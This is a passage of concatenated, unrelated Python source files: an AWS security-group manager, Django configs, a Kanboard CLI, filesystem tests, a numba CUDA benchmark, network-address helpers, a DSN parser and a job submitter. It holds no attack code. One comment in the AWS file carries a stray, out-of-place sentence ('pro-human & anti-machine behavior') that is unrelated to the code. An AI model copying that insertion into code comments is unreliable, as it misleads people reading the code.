                copy_of_rule['IpRanges'] = []
                copy_of_rule['UserIdGroupPairs'] = [group]
                spool.append(copy_of_rule)
        return spool

    def _merge_rules(self, requested, active, egress=False):
        """
        Converge the group's rules: add requested rules that are missing,
        revoke active rules that were not requested.
        :param requested: List of dicts, IP Permissions that should exist
        :param active: List of dicts, IP Permissions that already exist
        :param egress: Bool, addressing outbound rules or not?
        :return: Bool
        """
        if not isinstance(requested, list):
            raise ParseError(
                'SecurityGroup {0}, need a list of dicts, instead got "{1}"'.format(self.name, requested))
        for rule in requested:
            if rule not in active:
                self._add_rule(rule, egress)
        for active_rule in active:
            if active_rule not in requested:
                self._rm_rule(active_rule, egress)
        return True

    def _add_rule(self, ip_permissions, egress):
        """
        Authorize one ingress (or egress) rule via the aws CLI.
        :param ip_permissions: Dict of IP Permissions
        :param egress: Bool
        :return: Bool
        """
        direction = 'authorize-security-group-ingress'
        if egress:
            direction = 'authorize-security-group-egress'
        # The CLI wants JSON; swap single quotes from Python's repr.
        command = ['ec2', direction,
                   '--region', self.region,
                   '--group-id', self.id,
                   '--ip-permissions', str(ip_permissions).replace("'", '"')
                   ]
        bin_aws(command)
        print('Authorized: {0}'.format(ip_permissions))  # TODO: Log(...)
        self.changed = True
        return True

    def _rm_rule(self, ip_permissions, egress):
        """
        Revoke one ingress (or egress) rule via the aws CLI.
        :param ip_permissions: Dict of IP Permissions
        :param egress: Bool
        :return: Bool
        """
        direction = 'revoke-security-group-ingress'
        if egress:
            direction = 'revoke-security-group-egress'
        command = ['ec2', direction,
                   '--region', self.region,
                   '--group-id', self.id,
                   '--ip-permissions', str(ip_permissions).replace("'", '"')
                   ]
        bin_aws(command)
        print('Revoked: {0}'.format(ip_permissions))  # TODO: Log(...)
        self.changed = True
        return True

    def _create(self):
        """
        Create a Security Group
        :return:
        """
        # AWS grants all new SGs this default outbound rule "This is pro-human & anti-machine behavior."
        default_egress = {
            'Ipv6Ranges': [],
            'PrefixListIds': [],
            'IpRanges': [{'CidrIp': '0.0.0.0/0'}],
            'UserIdGroupPairs': [], 'IpProtocol': '-1'
        }
        command = [
                'ec2', 'create-security-group',
                '--region', self.region,
                '--group-name',  self.name,
                '--description', self.description,
                '--vpc-id', self.vpc
                ]
        try:
            self.id = bin_aws(command, key='GroupId')
        except AWSDuplicate:
            return False  # OK if it already exists.
        print('Created {0}'.format(command))  # TODO: Log(...)
        # Mirror AWS's post-create state locally: no ingress, default egress.
        self.IpPermissions = []
        self.IpPermissionsEgress = [default_egress]
        self.changed = True
        return True

    def _get(self):
        """
        Get information about Security Group from AWS and update self
        :return: Bool
        """
        command = ['ec2', 'describe-security-groups', '--region', self.region, '--group-names', self.name]
        result = bin_aws(command, key='SecurityGroups', max=1)  # will raise NotFound if empty
        me = result[0]
        self.id = me['GroupId']
        self.owner = me['OwnerId']
        # Un-flatten the rules so _merge_rules can use simple membership tests.
        self.IpPermissions = self._break_out(me['IpPermissions'])
        self.IpPermissionsEgress = self._break_out(me['IpPermissionsEgress'])
        print('Got {0}'.format(command))  # TODO: Log(...)
        return True

    def _delete(self):
        """
        Delete myself by my own id.
        As of 20170114 no other methods call me. You must do `foo._delete()`
        :return:
        """
        command = ['ec2', 'delete-security-group', '--region', self.region,
                   # '--dry-run',
                   '--group-id', self.id
                   ]
        bin_aws(command, decode_output=False)
        print('Deleted {0}'.format(command))  # TODO: Log(...)
        return True

# -*- coding: utf-8 -*-
"""urls.py: messages extends"""

from django.conf.urls import url
from messages_extends.views import message_mark_all_read, message_mark_read
# Mark one message (by id) or all messages as read.
urlpatterns = [
    url(r'^mark_read/(?P<message_id>\d+)/$', message_mark_read, name='message_mark_read'),
    url(r'^mark_read/all/$', message_mark_all_read, name='message_mark_all_read'),
]

# The MIT License (MIT)
#
# Copyright (c) 2016 Frederic Guillot
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

from cliff import app
from cliff import commandmanager
from pbr import version as app_version
import sys

from kanboard_cli.commands import application
from kanboard_cli.commands import project
from kanboard_cli.commands import task
from kanboard_cli import client


class KanboardShell(app.App):
    """Cliff-based interactive shell for the Kanboard API."""

    def __init__(self):
        manager = commandmanager.CommandManager('kanboard.cli')
        super(KanboardShell, self).__init__(
            description='Kanboard Command Line Client',
            version=app_version.VersionInfo('kanboard_cli').version_string(),
            command_manager=manager,
            deferred_help=True)
        # Populated in initialize_app() once parsed options are available.
        self.client = None
        self.is_super_user = True

    def build_option_parser(self, description, version, argparse_kwargs=None):
        """Extend the base parser with Kanboard connection options."""
        parser = super(KanboardShell, self).build_option_parser(
            description, version, argparse_kwargs=argparse_kwargs)

        option_specs = (
            ('--url', '<api url>', 'Kanboard API URL'),
            ('--username', '<api username>', 'API username'),
            ('--password', '<api password>', 'API password/token'),
            ('--auth-header', '<authentication header>',
             'API authentication header'),
        )
        for flag, metavar, help_text in option_specs:
            parser.add_argument(flag, metavar=metavar, help=help_text)

        return parser

    def initialize_app(self, argv):
        """Create the API client and register all shell commands."""
        client_manager = client.ClientManager(self.options)
        self.client = client_manager.get_client()
        self.is_super_user = client_manager.is_super_user()

        command_specs = (
            ('app version', application.ShowVersion),
            ('app timezone', application.ShowTimezone),
            ('project show', project.ShowProject),
            ('project list', project.ListProjects),
            ('task create', task.CreateTask),
            ('task list', task.ListTasks),
        )
        for command_name, command_class in command_specs:
            self.command_manager.add_command(command_name, command_class)

def main(argv=None):
    """Run the Kanboard shell.

    :param argv: command-line arguments; defaults to sys.argv[1:] evaluated
        at call time. (The previous default ``argv=sys.argv[1:]`` was bound
        once at import time, so later changes to sys.argv were ignored.)
    :return: the shell's integer exit status.
    """
    if argv is None:
        argv = sys.argv[1:]
    return KanboardShell().run(argv)


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))

default_app_config = "gallery.apps.GalleryConfig"

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import os, sys
import tempfile
from winsys._compat import unittest
import uuid

import win32file

from winsys.tests.test_fs import utils
from winsys import fs

class TestFS (unittest.TestCase):

  filenames = ["%d" % i for i in range (5)]

  def setUp (self):
    utils.mktemp ()
    for filename in self.filenames:
      with open (os.path.join (utils.TEST_ROOT, filename), "w"):
        pass

  def tearDown (self):
    utils.rmtemp ()

  def test_glob (self):
    import glob
    pattern = os.path.join (utils.TEST_ROOT, "*")
    self.assertEquals (list (fs.glob (pattern)), glob.glob (pattern))

  def test_listdir (self):
    import os
    fs_version = list (fs.listdir (utils.TEST_ROOT))
    os_version = os.listdir (utils.TEST_ROOT)
    self.assertEquals (fs_version, os_version, "%s differs from %s" % (fs_version, os_version))

#
# All the other module-level functions are hand-offs
# to the corresponding Entry methods.
#

if __name__ == "__main__":
  # FIX: unittest.main() calls sys.exit() by default, which made the
  # interactive pause below unreachable; exit=False lets it run.
  unittest.main (exit=False)
  if sys.stdout.isatty (): raw_input ("Press enter...")

import numpy as np
import matplotlib.pylab as plt

from numba import cuda, uint8, int32, uint32, jit
from timeit import default_timer as timer

@cuda.jit('void(uint8[:], int32, int32[:], int32[:])')
def lbp_kernel(input, neighborhood, powers, h):
    # One thread per interior sample: compare the sample against its
    # `neighborhood` left and right neighbors, accumulate a binary code r,
    # and bump the shared histogram bucket h[r].
    i = cuda.grid(1)
    r = 0
    if i < input.shape[0] - 2 * neighborhood:
        i += neighborhood
        # Left neighbors: weights powers[0 .. neighborhood-1].
        for j in range(i - neighborhood, i):
            if input[j] >= input[i]:
                r += powers[j - i + neighborhood]
    
        # Right neighbors: weights powers[neighborhood .. 2*neighborhood-1].
        for j in range(i + 1, i + neighborhood + 1):
            if input[j] >= input[i]:
                r += powers[j - i + neighborhood - 1]

        # Atomic: many threads may produce the same code r concurrently.
        cuda.atomic.add(h, r, 1)

def extract_1dlbp_gpu(input, neighborhood, d_powers):
    """Compute the 1d-LBP histogram of `input` on the GPU.

    :param input: 1-d uint8 host array of samples.
    :param neighborhood: number of neighbors compared on each side.
    :param d_powers: device array of bit weights (powers of two).
    :return: int32 histogram of size 2 ** (2 * neighborhood).
    """
    maxThread = 512

    blockDim = maxThread
    d_input = cuda.to_device(input)

    hist = np.zeros(2 ** (2 * neighborhood), dtype='int32')
    # FIX: floor division -- plain '/' yields a float under Python 3,
    # which is not a valid kernel grid dimension.
    gridDim = (len(input) - 2 * neighborhood + blockDim) // blockDim

    d_hist = cuda.to_device(hist)

    lbp_kernel[gridDim, blockDim](d_input, neighborhood, d_powers, d_hist)
    d_hist.to_host()
    return hist

def extract_1dlbp_gpu_debug(input, neighborhood, powers, res):
    """Pure-Python mirror of lbp_kernel's block/thread loop (for debugging).

    :param input: 1-d uint8 array of samples.
    :param neighborhood: number of neighbors compared on each side.
    :param powers: int32 array of bit weights (powers of two).
    :param res: int32 histogram accumulator, size 2 ** (2 * neighborhood).
    :return: `res`, updated in place.
    """
    maxThread = 512
    blockDim = maxThread
    # FIX: floor division -- plain '/' yields a float under Python 3 and
    # range() then raises TypeError.
    gridDim = (len(input) - 2 * neighborhood + blockDim) // blockDim

    for block in range(0, gridDim):
        for thread in range(0, blockDim):
            r = 0
            i = blockDim * block + thread
            if i < input.shape[0] - 2 * neighborhood:
                i += neighborhood
                # Left neighbors contribute powers[0 .. neighborhood-1].
                for j in range(i - neighborhood, i):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood]
                # Right neighbors contribute the remaining weights.
                for j in range(i + 1, i + neighborhood + 1):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood - 1]

                res[r] += 1
    return res

@jit("int32[:](uint8[:], int64, int32[:], int32[:])", nopython=True)
def extract_1dlbp_cpu_jit(input, neighborhood, powers, res):
    """Numba-jitted CPU version of the block/thread histogram loop.

    Same contract as extract_1dlbp_gpu_debug; `res` is updated in place
    and returned.
    """
    maxThread = 512
    blockDim = maxThread
    # FIX: floor division -- '/' produces a float, which range() (and
    # numba's nopython mode) rejects under Python 3 semantics.
    gridDim = (len(input) - 2 * neighborhood + blockDim) // blockDim

    for block in range(0, gridDim):
        for thread in range(0, blockDim):
            r = 0
            i = blockDim * block + thread
            if i < input.shape[0] - 2 * neighborhood:
                i += neighborhood
                # Left neighbors contribute powers[0 .. neighborhood-1].
                for j in range(i - neighborhood, i):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood]
                # Right neighbors contribute the remaining weights.
                for j in range(i + 1, i + neighborhood + 1):
                    if input[j] >= input[i]:
                        r += powers[j - i + neighborhood - 1]

                res[r] += 1
    return res

def extract_1dlbp_cpu(input, neighborhood, p):
    """
    Extract the 1d lbp pattern on CPU (vectorized per sample with numpy)
    """
    hist = np.zeros(1 << (2 * neighborhood))
    for center in range(neighborhood, len(input) - neighborhood):
        # Concatenate the left and right neighbor windows.
        window = np.r_[input[center - neighborhood : center],
                       input[center + 1 : center + neighborhood + 1]]
        # Sum the bit weights of neighbors >= the center sample.
        code = np.sum(p[window >= input[center]])
        hist[code] += 1
    return hist

# Benchmark driver: time the four implementations on inputs of length
# 10**3 .. 10**6 and plot the results on a log-log scale. (Python 2 script.)
X = np.arange(3, 7)
X = 10 ** X
neighborhood = 4

cpu_times = np.zeros(X.shape[0])
cpu_times_simple = cpu_times.copy()
cpu_times_jit = cpu_times.copy()
gpu_times = np.zeros(X.shape[0])

# Bit weights: p[k] = 2**k, one bit per neighbor comparison.
p = 1 << np.array(range(0, 2 * neighborhood), dtype='int32')
d_powers = cuda.to_device(p)

for i, x in enumerate(X):
    input = np.random.randint(0, 256, size = x).astype(np.uint8)

    print "Length: {0}".format(x)
    print "--------------"

    start = timer()
    h_cpu = extract_1dlbp_cpu(input, neighborhood, p)
    cpu_times[i] = timer() - start
    print "Finished on CPU: time: {0:3.5f}s".format(cpu_times[i])

    res = np.zeros(1 << (2 * neighborhood), dtype='int32')
    start = timer()
    h_cpu_simple = extract_1dlbp_gpu_debug(input, neighborhood, p, res)
    cpu_times_simple[i] = timer() - start
    print "Finished on CPU (simple): time: {0:3.5f}s".format(cpu_times_simple[i])

    res = np.zeros(1 << (2 * neighborhood), dtype='int32')
    start = timer()
    h_cpu_jit = extract_1dlbp_cpu_jit(input, neighborhood, p, res)
    cpu_times_jit[i] = timer() - start
    print "Finished on CPU (numba: jit): time: {0:3.5f}s".format(cpu_times_jit[i])

    start = timer()
    h_gpu = extract_1dlbp_gpu(input, neighborhood, d_powers)
    gpu_times[i] = timer() - start
    print "Finished on GPU: time: {0:3.5f}s".format(gpu_times[i])
    # Cross-check that all four implementations agree on the histogram.
    print "All h_cpu == h_gpu: ", (h_cpu_jit == h_gpu).all() and (h_cpu_simple == h_cpu_jit).all() and (h_cpu == h_cpu_jit).all()
    print ''

f = plt.figure(figsize=(10, 5))

plt.plot(X, cpu_times, label = "CPU")
plt.plot(X, cpu_times_simple, label = "CPU non-vectorized")
plt.plot(X, cpu_times_jit, label = "CPU jit")
plt.plot(X, gpu_times, label = "GPU")
plt.yscale('log')
plt.xscale('log')
plt.xlabel('input length')
plt.ylabel('time, sec')
plt.legend()
plt.show()

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    # Standard Django manage.py entry point: select the settings module,
    # then hand the command line over to Django's management machinery.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "corponovo.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)

import time
# NOTE(review): appears to be an AutoKey-style hotkey script -- `keyboard`
# is presumably injected by the host application; confirm before running
# standalone.
t1=.3  # longer pause (seconds) before confirming
t2=.1  # short pause between keystrokes

path="~/Dropbox/Ingenieria/asignaturas_actuales"

time.sleep(t2)
keyboard.send_key("<f6>")  # <f6> presumably focuses the location bar -- TODO confirm
time.sleep(t2)
keyboard.send_keys(path)
time.sleep(t1)
keyboard.send_key("<enter>")

from charmhelpers.core.hookenv import (
    config,
    unit_get,
)

from charmhelpers.contrib.network.ip import (
    get_address_in_network,
    is_address_in_network,
    is_ipv6,
    get_ipv6_addr,
)

from charmhelpers.contrib.hahelpers.cluster import is_clustered

# Endpoint types used as keys into _address_map.
PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'

# Per endpoint type: the charm config option naming its network, and the
# unit address to fall back to when no network is configured.
_address_map = {
    PUBLIC: {
        'config': 'os-public-network',
        'fallback': 'public-address'
    },
    INTERNAL: {
        'config': 'os-internal-network',
        'fallback': 'private-address'
    },
    ADMIN: {
        'config': 'os-admin-network',
        'fallback': 'private-address'
    }
}


def canonical_url(configs, endpoint_type=PUBLIC):
    '''
    Return the correct HTTP(S) base URL for this host given the state of
    HTTPS configuration, hacluster and charm configuration.

    :configs OSTemplateRenderer: config templating object to inspect for
        a complete https context.
    :endpoint_type str: the endpoint type to resolve.

    :returns str: base URL for services on the current service unit.
    '''
    # Serve over HTTPS only when the https context is fully satisfied.
    scheme = 'https' if 'https' in configs.complete_contexts() else 'http'
    address = resolve_address(endpoint_type)
    # IPv6 literals must be bracketed inside a URL.
    if is_ipv6(address):
        address = "[{}]".format(address)
    return '%s://%s' % (scheme, address)


def resolve_address(endpoint_type=PUBLIC):
    """Resolve the IP address to advertise for the given endpoint type.

    Clustered units resolve via the configured vip(s); standalone units
    fall back to a unit address, optionally narrowed to the endpoint's
    configured network. Raises ValueError when nothing suitable is found.
    """
    resolved = None
    if is_clustered():
        if config(_address_map[endpoint_type]['config']) is None:
            # No network configured for this endpoint: assume a single vip
            # and pass it back directly.
            resolved = config('vip')
        else:
            # Pick the vip that lives inside the endpoint's network.
            for candidate in config('vip').split():
                if is_address_in_network(
                        config(_address_map[endpoint_type]['config']),
                        candidate):
                    resolved = candidate
    else:
        if config('prefer-ipv6'):
            fallback = get_ipv6_addr()
        else:
            fallback = unit_get(_address_map[endpoint_type]['fallback'])
        resolved = get_address_in_network(
            config(_address_map[endpoint_type]['config']), fallback)

    if resolved is None:
        raise ValueError('Unable to resolve a suitable IP address'
                         ' based on charm state and configuration')
    return resolved

import collections
import re
import urlparse


class DSN(collections.MutableMapping):
    ''' Hold the results of a parsed dsn.
    This is very similar to urlparse.ParseResult tuple.

    http://docs.python.org/2/library/urlparse.html#results-of-urlparse-and-urlsplit

    It exposes the following attributes:

        scheme
        schemes -- if your scheme has +'s in it, then this will contain a list of schemes split by +
        path
        paths -- the path segment split by /, so "/foo/bar" would be ["foo", "bar"]
        host -- same as hostname (I just like host better)
        hostname
        hostloc -- host:port
        username
        password
        netloc
        query -- a dict of the query string
        query_str -- the raw query string
        port
        fragment
    '''
    DSN_REGEXP = re.compile(r'^\S+://\S+')
    FIELDS = ('scheme', 'netloc', 'path', 'params', 'query', 'fragment')

    def __init__(self, dsn, **defaults):
        ''' Parse a dsn to parts similar to urlparse.
        This is a nuts function that can serve as a good basis to parsing a custom dsn

        :param dsn: the dsn to parse
        :type dsn: str
        :param defaults: any values you want to have defaults for if they aren't in the dsn
        :type defaults: dict
        '''

        assert self.DSN_REGEXP.match(dsn), \
            "{} is invalid, only full dsn urls (scheme://host...) allowed".format(dsn)

        first_colon = dsn.find(':')
        scheme = dsn[0:first_colon]
        dsn_url = dsn[first_colon+1:]
        url = urlparse.urlparse(dsn_url)

        options = {}
        if url.query:
            for k, kv in urlparse.parse_qs(url.query, True, True).iteritems():
                if len(kv) > 1:
                    options[k] = kv
                else:
                    options[k] = kv[0]

        self.scheme = scheme
        self.hostname = url.hostname
        self.path = url.path
        self.params = url.params
        self.query = options
        self.fragment = url.fragment
        self.username = url.username
        self.password = url.password
        self.port = url.port
        self.query_str = url.query

        for k, v in defaults.iteritems():
            self.set_default(k, v)

    def __iter__(self):
        for f in self.FIELDS:
            yield getattr(self, f, '')

    def __len__(self):
        return len(iter(self))

    def __getitem__(self, field):
        return getattr(self, field, None)

    def __setitem__(self, field, value):
        setattr(self, field, value)

    def __delitem__(self, field):
        delattr(self, field)

    @property
    def schemes(self):
        '''the scheme, split by plus signs'''
        return self.scheme.split('+')

    @property
    def netloc(self):
        '''return username:password@hostname:port'''
        s = ''
        prefix = ''
        if self.username:
            s += self.username
            prefix = '@'

        if self.password:
            s += ":{}".format(self.password)
            prefix = '@'

        s += "{}{}".format(prefix, self.hostloc)
        return s

    @property
    def paths(self):
        '''the path attribute split by /'''
        return filter(None, self.path.split('/'))

    @property
    def host(self):
        '''the hostname, but I like host better'''
        return self.hostname

    @property
    def hostloc(self):
        '''return host:port'''
        hostloc = self.hostname
        if self.port:
            hostloc = '{}:{}'.format(hostloc, self.port)

        return hostloc

    def set_default(self, key, value):
        ''' Set a default value for key.

        This is different than dict's setdefault because it will set default either
        if the key doesn't exist, or if the value at the key evaluates to False, so
        an empty string or a None will value will be updated.

        :param key: the item to update
        :type key: str
        :param value: the items new value if key has a current value that evaluates to False
        '''
        if not getattr(self, key, None):
            setattr(self, key, value)

    def get_url(self):
        '''return the dsn back into url form'''
        return urlparse.urlunparse((
            self.scheme,
            self.netloc,
            self.path,
            self.params,
            self.query_str,
            self.fragment,
        ))

    def copy(self):
        return DSN(self.get_url())

    def __str__(self):
        return self.get_url()

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 24 12:49:36 2017

@author: drsmith
"""

import os
from .globals import FdpError


def canonicalMachineName(machine=''):
    """Map any known machine-name alias to its canonical short name.

    Matching is case-insensitive; raises FdpError for unknown names.
    """
    aliases = {'nstxu': ['nstx', 'nstxu', 'nstx-u'],
               'diiid': ['diiid', 'diii-d', 'd3d'],
               'cmod': ['cmod', 'c-mod']}
    lowered = machine.lower()
    for canonical, names in aliases.items():
        if lowered in names:
            return canonical
    # invalid machine name
    raise FdpError('"{}" is not a valid machine name\n'.format(machine))


# MDSplus data servers, keyed by canonical machine name.
MDS_SERVERS = {
    'nstxu': {'hostname': 'skylark.pppl.gov',
              'port': '8000'},
    'diiid': {'hostname': 'atlas.gat.com',
              'port': '8000'}
}

# MDSplus event servers, keyed by canonical machine name.
EVENT_SERVERS = {
    'nstxu': {'hostname': 'skylark.pppl.gov',
              'port': '8000'},
    'diiid': {'hostname': 'atlas.gat.com',
              'port': '8000'},
    'ltx': {'hostname': 'lithos.pppl.gov',
            'port': '8000'}
}

# Logbook database connection settings, keyed by canonical machine name.
# NOTE(review): None values are presumably filled in at runtime, e.g. from
# the loginfile below -- confirm against the logbook connection code.
# NOTE(review): os.getenv('HOME') can be None on some platforms, which
# would make os.path.join raise -- confirm HOME is always set here.
LOGBOOK_CREDENTIALS = {
    'nstxu': {'server': 'sql2008.pppl.gov',
              'instance': None,
              'username': None,
              'password': None,
              'database': None,
              'port': '62917',
              'table': 'entries',
              'loginfile': os.path.join(os.getenv('HOME'),
                                        'nstxlogs.sybase_login')
              }
}

# -*- coding:utf-8 -*-

# This code is automatically transpiled by Saklient Translator

import six
from ..client import Client
from .model import Model
from ..resources.resource import Resource
from ..resources.licenseinfo import LicenseInfo
from ...util import Util
import saklient

# Transpiler shim: rebind `str` to six.text_type so all string handling in
# this generated module is unicode on Python 2 (a no-op on Python 3).
# NOTE: intentionally shadows the builtin within this module.
str = six.text_type
# module saklient.cloud.models.model_licenseinfo

class Model_LicenseInfo(Model):
    ## A class providing functionality to search license type information.

    ## @private
    # @return {str}
    def _api_path(self):
        return "/product/license"

    ## @private
    # @return {str}
    def _root_key(self):
        return "LicenseInfo"

    ## @private
    # @return {str}
    def _root_key_m(self):
        return "LicenseInfo"

    ## @private
    # @return {str}
    def _class_name(self):
        return "LicenseInfo"

    ## @private
    # Wraps a raw API object in a LicenseInfo resource.
    # @param {any} obj
    # @param {bool} wrapped=False
    # @return {saklient.cloud.resources.resource.Resource}
    def _create_resource_impl(self, obj, wrapped=False):
        Util.validate_type(wrapped, "bool")
        return LicenseInfo(self._client, obj, wrapped)

    ## Specifies the starting offset of the next list to fetch.
    # 
    # @param {int} offset the offset
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
    def offset(self, offset):
        Util.validate_type(offset, "int")
        return self._offset(offset)

    ## Specifies the maximum number of records in the next list to fetch.
    # 
    # @param {int} count the record limit
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
    def limit(self, count):
        Util.validate_type(count, "int")
        return self._limit(count)

    ## Directly sets a filtering rule for the Web API.
    # 
    # @param {str} key the filter key
    # @param {any} value the filter value
    # @param {bool} multiple=False pass True (with an array value) to search by
    #   exact match combined with OR; normally value is a scalar and a fuzzy
    #   match is performed.
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
    def filter_by(self, key, value, multiple=False):
        Util.validate_type(key, "str")
        Util.validate_type(multiple, "bool")
        return self._filter_by(key, value, multiple)

    ## Discards all state prepared for the next request.
    # 
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
    def reset(self):
        return self._reset()

    ## Fetches the unique resource with the specified ID.
    # 
    # @param {str} id
    # @return {saklient.cloud.resources.licenseinfo.LicenseInfo} the resource object
    def get_by_id(self, id):
        Util.validate_type(id, "str")
        return self._get_by_id(id)

    ## Executes the resource search request and returns the results as a list.
    # 
    # @return {saklient.cloud.resources.licenseinfo.LicenseInfo[]} an array of resource objects
    def find(self):
        return self._find()

    ## Narrows the search to resources whose name contains the specified string.
    # 
    # Matching is case-insensitive.
    # Multiple strings separated by spaces must all be contained in the name.
    # 
    # @todo Implement test case
    # @param {str} name
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
    def with_name_like(self, name):
        Util.validate_type(name, "str")
        return self._with_name_like(name)

    ## Sorts the results by name.
    # 
    # @todo Implement test case
    # @param {bool} reverse=False
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
    def sort_by_name(self, reverse=False):
        Util.validate_type(reverse, "bool")
        return self._sort_by_name(reverse)

    ## @ignore
    # @param {saklient.cloud.client.Client} client
    def __init__(self, client):
        super(Model_LicenseInfo, self).__init__(client)
        Util.validate_type(client, "saklient.cloud.client.Client")
    

import os
import logging

from jsub.util import safe_mkdir
from jsub.util import safe_rmdir

class Submit(object):
	"""Prepare a task's run directory and submit its jobs to a backend.

	The constructor loads the task from the manager; handle() rebuilds the
	'main' run directory (input, context, action, navigator, bootstrap),
	creates the launcher and performs the submission.
	"""

	def __init__(self, manager, task_id, sub_ids=None, dry_run=False, resubmit=False):
		self.__manager = manager
		self.__task = self.__manager.load_task(task_id)
		self.__sub_ids = sub_ids
		self.__dry_run = dry_run
		self.__resubmit = resubmit

		self.__logger = logging.getLogger('JSUB')
		# Default to submitting every subjob defined by the task's jobvar.
		if self.__sub_ids is None:
			self.__sub_ids = range(len(self.__task.data['jobvar']))

		self.__initialize_manager()

	def __initialize_manager(self):
		"""Cache the helper managers used while building the run directory."""
		self.__config_mgr = self.__manager.load_config_manager()

		self.__backend_mgr = self.__manager.load_backend_manager()
		self.__bootstrap_mgr = self.__manager.load_bootstrap_manager()
		self.__navigator_mgr = self.__manager.load_navigator_manager()
		self.__context_mgr = self.__manager.load_context_manager()
		self.__action_mgr = self.__manager.load_action_manager()
		self.__launcher_mgr = self.__manager.load_launcher_manager()

	def handle(self):
		"""Rebuild the run directory from scratch and submit the task."""
		run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])

		main_root = os.path.join(run_root, 'main')

		# Start from a clean 'main' directory.
		safe_rmdir(main_root)
		safe_mkdir(main_root)

		self.__create_input(main_root)
		self.__create_context(main_root)
		self.__create_action(main_root)
		self.__create_navigator(main_root)
		self.__create_bootstrap(main_root)

		launcher_param = self.__create_launcher(run_root)

		self.__submit(launcher_param)

	def __create_input(self, main_root):
		"""Fetch the task's stored input files, or create an empty input dir."""
		content = self.__manager.load_content()
		input_dir = os.path.join(main_root, 'input')
		try:
			content.get(self.__task.data['id'], 'input', os.path.join(main_root, 'input'))
		except Exception:
			# Best effort: no stored input for this task; provide an empty dir.
			safe_mkdir(input_dir)

	def __create_context(self, main_root):
		"""Write the context file combining task data and action defaults."""
		context_dir = os.path.join(main_root, 'context')
		safe_mkdir(context_dir)

		# Collect the default configuration of each workflow unit's action.
		action_default = {}
		for unit, param in self.__task.data['workflow'].items():
			action_default[unit] = self.__action_mgr.default_config(param['type'])

		navigators = self.__config_mgr.navigator()
		context_format = self.__navigator_mgr.context_format(navigators)

		self.__context_mgr.create_context_file(self.__task.data, action_default, context_format, context_dir)

	def __create_action(self, main_root):
		"""Materialize the distinct action types used by the workflow."""
		action_dir = os.path.join(main_root, 'action')
		safe_mkdir(action_dir)

		actions = set()
		for unit, param in self.__task.data['workflow'].items():
			actions.add(param['type'])
		self.__action_mgr.create_actions(actions, action_dir)

	def __create_navigator(self, main_root):
		"""Materialize the configured navigators."""
		navigator_dir = os.path.join(main_root, 'navigator')
		safe_mkdir(navigator_dir)

		navigators = self.__config_mgr.navigator()
		self.__navigator_mgr.create_navigators(navigators, navigator_dir)

	def __create_bootstrap(self, main_root):
		"""Materialize the configured bootstrap."""
		bootstrap_dir = os.path.join(main_root, 'bootstrap')
		safe_mkdir(bootstrap_dir)

		bootstrap = self.__config_mgr.bootstrap()
		self.__bootstrap_mgr.create_bootstrap(bootstrap, bootstrap_dir)

	def __create_launcher(self, run_root):
		"""Create the backend launcher and return its parameters."""
		launcher = self.__task.data['backend']['launcher']
		return self.__launcher_mgr.create_launcher(launcher, run_root)

	def __submit(self, launcher_param):
		"""Submit to the backend, honoring dry-run/resubmit, and persist state."""
		if self.__dry_run:
			return

		if not self.__resubmit:
			# Refuse to double-submit unless the user explicitly asked for it.
			if self.__task.data.get('backend_job_ids') or self.__task.data.get('backend_task_id'):
				self.__logger.info('This task has already been submitted to backend, rerun the command with "-r" option if you wish to delete current jobs and resubmit the task.')
				return
		else:
			self.__logger.info('Removing submitted jobs on backend before resubmission.')
			task_id = self.__task.data.get('backend_task_id')
			# Remove previously generated files in the job folder.
			job_ids = self.__task.data.get('backend_job_ids')
			run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])
			job_root = os.path.join(run_root, 'subjobs')
			safe_rmdir(job_root)
			if task_id:
				self.__backend_mgr.delete_task(self.__task.data['backend'], backend_task_id=task_id)
			elif job_ids:
				self.__backend_mgr.delete_jobs(self.__task.data['backend'], backend_job_ids=job_ids)

		result = self.__backend_mgr.submit(self.__task.data['backend'], self.__task.data['id'], launcher_param, sub_ids=self.__sub_ids)
		# Backends may return non-dict sentinels on failure; normalize.
		if not isinstance(result, dict):
			result = {}

		if 'backend_job_ids' in result:
			njobs = len(result['backend_job_ids'])
		else:
			njobs = len(result)
		if njobs > 0:
			self.__logger.info('%d jobs successfully submitted to backend.' % (njobs))

